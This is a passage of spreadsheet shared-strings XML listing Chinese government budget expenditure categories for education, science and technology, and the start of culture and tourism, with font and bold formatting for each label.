  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>高等职业教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他职业教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>成人教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>成人初等教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>成人中等教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>成人高等教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>成人广播电视教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他成人教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>广播电视教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>广播电视学校</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>教育电视台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他广播电视教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>留学教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>出国留学教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>来华留学教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他留学教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>特殊教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>特殊学校教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工读学校教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他特殊教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>进修及培训</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>教师进修</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>干部教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>培训支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退役士兵能力提升</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他进修及培训</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>教育费附加安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村中小学校舍建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村中小学教学设施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市中小学校舍建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市中小学教学设施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中等职业学校教学设施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他教育费附加安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科学技术支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科学技术管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他科学技术管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基础研究</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>机构运行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然科学基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>实验室及相关设施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重大科学工程</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项基础科研</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项技术基础</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技人才队伍建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他基础研究支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>应用研究</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会公益研究</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>高技术研究</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项科研试制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他应用研究支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>技术研究与开发</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技成果转化与扩散</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>共性技术研究与开发</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他技术研究与开发支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技条件与服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>技术创新服务体系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技条件专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他科技条件与服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会科学</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会科学研究机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会科学研究</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社科基金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他社会科学支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科学技术普及</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科普活动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>青少年科技活动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>学术交流活动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技馆站</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他科学技术普及支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技交流与合作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际交流与合作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重大科技合作项目</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他科技交流与合作支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技重大项目</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技重大专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重点研发计划</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他科技重大项目</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他科学技术支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技奖励</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>核应急</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>转制科研机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他科学技术支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化旅游体育与传媒支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化和旅游</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>图书馆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化展示及纪念机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>艺术表演场所</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
